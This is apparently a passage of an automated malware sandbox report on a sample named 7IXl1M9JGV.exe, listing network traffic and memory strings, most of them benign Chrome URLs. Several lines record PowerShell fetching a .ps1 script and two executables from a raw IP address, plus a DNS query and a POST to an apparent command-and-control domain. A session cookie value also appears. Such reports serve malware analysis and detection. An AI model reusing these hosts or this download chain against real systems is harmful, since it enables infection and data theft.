Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic	HTTP traffic detected: GET /infopage/bhdh552.ps1 HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: 147.45.44.131Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /infopage/hdt.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
Source: global traffic	HTTP traffic detected: GET /infopage/tbg9.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
Source: global traffic	HTTP traffic detected: GET /r/r1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog

Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000003.969800499.000009B400218000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.969742442.000009B40148C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$1()}render(){return getHtml$1.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$2=null;function getCss(){return instance$2\|\|(instance$2=[...[getCss$3()],css`:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chro
Source: chrome.exe, 00000008.00000003.969800499.000009B400218000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.969742442.000009B40148C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$1()}render(){return getHtml$1.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$2=null;function getCss(){return instance$2\|\|(instance$2=[...[getCss$3()],css`:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chro
Source: chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2132114432.000009B400728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000002.2137374756.000009B40109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130814925.000009B400320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000002.2141553304.000009B4018B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2140308644.000009B4014F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000002.2140308644.000009B4014F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlult equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000002.2130814925.000009B400320000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: knifedxejsu.cyou
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: knifedxejsu.cyou

Source: global traffic	TCP traffic: 192.168.11.20:57324 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:57324 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:57324 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:57324 -> 239.255.255.250:1900

Source: 7IXl1M9JGV.exe, 00000000.00000000.869251338.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://147.45.44.131/infopage/bhdh552.ps1
Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000008.00000002.2133904022.000009B400A04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=128
Source: chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.966655744.000009B400A84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/941620
Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2125456034.000001EE12302000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: chrome.exe, 00000008.00000002.2137331333.000009B401088000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: chrome.exe, 00000008.00000002.2137331333.000009B401088000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2125456034.000001EE12302000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: chrome.exe, 00000008.00000002.2133612138.000009B40099C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2132290116.000009B400778000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.0/jamhcnnkihi
Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/acowdfe2t76yuidsex3ifs6nk3da_20241026.690810062.14/ob
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/actfcfanl4hq5aaxnnweccjxua6q_2024.11.6.1/jflhchccmppk
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/eeigpng
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.1305/cocncanleaf
Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/cvde376f6tyxybuonyzcqfilye_2024.10.30.0/niikhdgajlphf
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/cxxqn654fg7hzrcrrnqcniqqye_2024.10.11.1/kiabhabjdbkjd
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0/gonpemdgkjcecd
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dl.google.com/release2/chrome_component/p2zbkxfgkqyr6ljey2oe3bnzoy_2023.11.29.1201/ggkkehgbnf
Source: chrome.exe, 00000008.00000002.2138838858.000009B4012CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dns-tunnel-check.googlezip.net/connect
Source: chrome.exe, 00000008.00000002.2130054872.000009B40015C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1546757959.000009B400D83000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139462568.000009B4013B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwy
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjhkYWYwZDctOTExOS00
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.0
Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acowdfe2t76yuidsex3ifs6nk3da_20241026.690
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/actfcfanl4hq5aaxnnweccjxua6q_2024.11.6.1/
Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ad3skwo2srs5xchyxzz6ujgnedha_9.52.0/gcmjk
Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/cvde376f6tyxybuonyzcqfilye_2024.10.30.0/n
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/cxxqn654fg7hzrcrrnqcniqqye_2024.10.11.1/k
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0/go
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2125456034.000001EE12302000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2126075591.000001EE1237A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1596047557.000001EE1A4A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2124880454.000001EE12264000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2123959093.000001EE10F02000.00000004.00000020.00020000.00000000.sdmp, edb.log.14.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/nei
Source: chrome.exe, 00000008.00000002.2137331333.000009B401088000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: chrome.exe, 00000008.00000002.2137331333.000009B401088000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: chrome.exe, 00000008.00000003.972811086.000009B400510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.970825869.000009B401604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971217420.000009B400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973089654.000009B401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971344270.000009B401664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971109499.000009B401630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972963112.000009B400544000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 00000008.00000003.972811086.000009B400510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.970825869.000009B401604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971217420.000009B400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973089654.000009B401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971344270.000009B401664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971109499.000009B401630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972963112.000009B400544000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 00000008.00000003.972811086.000009B400510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.970825869.000009B401604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971217420.000009B400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973089654.000009B401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971344270.000009B401664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971109499.000009B401630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972963112.000009B400544000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 00000008.00000003.972811086.000009B400510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.970825869.000009B401604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971217420.000009B400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973089654.000009B401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971344270.000009B401664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971109499.000009B401630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972963112.000009B400544000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjhkYWYwZDctOTExOS0
Source: chrome.exe, 00000008.00000002.2137331333.000009B401088000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: chrome.exe, 00000008.00000002.2135517261.000009B400DC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://unisolated.invalid/
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.0/jamhcnn
Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/acowdfe2t76yuidsex3ifs6nk3da_20241026.690810062.1
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/actfcfanl4hq5aaxnnweccjxua6q_2024.11.6.1/jflhchcc
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/eei
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.1305/cocncan
Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/cvde376f6tyxybuonyzcqfilye_2024.10.30.0/niikhdgaj
Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/cxxqn654fg7hzrcrrnqcniqqye_2024.10.11.1/kiabhabjd
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0/gonpemdgkj
Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/neifaoindgg
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/dl/release2/chrome_component/p2zbkxfgkqyr6ljey2oe3bnzoy_2023.11.29.1201/ggkkeh
Source: chrome.exe, 00000008.00000002.2135770117.000009B400E0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.gstatic.com/generate_204
Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2125456034.000001EE12302000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2125122119.000001EE12296000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: chrome.exe, 00000008.00000003.966714458.000009B400A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137958094.000009B40116C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;dc_pre=CL6sqZyWpIgDFWU-RAgdUQci9A;src=2542116;type=cli
Source: chrome.exe, 00000008.00000002.2134562051.000009B400BB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141351455.000009B401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com
Source: chrome.exe, 00000008.00000002.2134616236.000009B400BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abr
Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000008.00000002.2129411778.000009B400034000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000008.00000002.2140871311.000009B401704000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2132114432.000009B400728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141390711.000009B401848000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2132290116.000009B400778000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000008.00000002.2140871311.000009B401704000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130814925.000009B400320000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AccountChooser
Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout
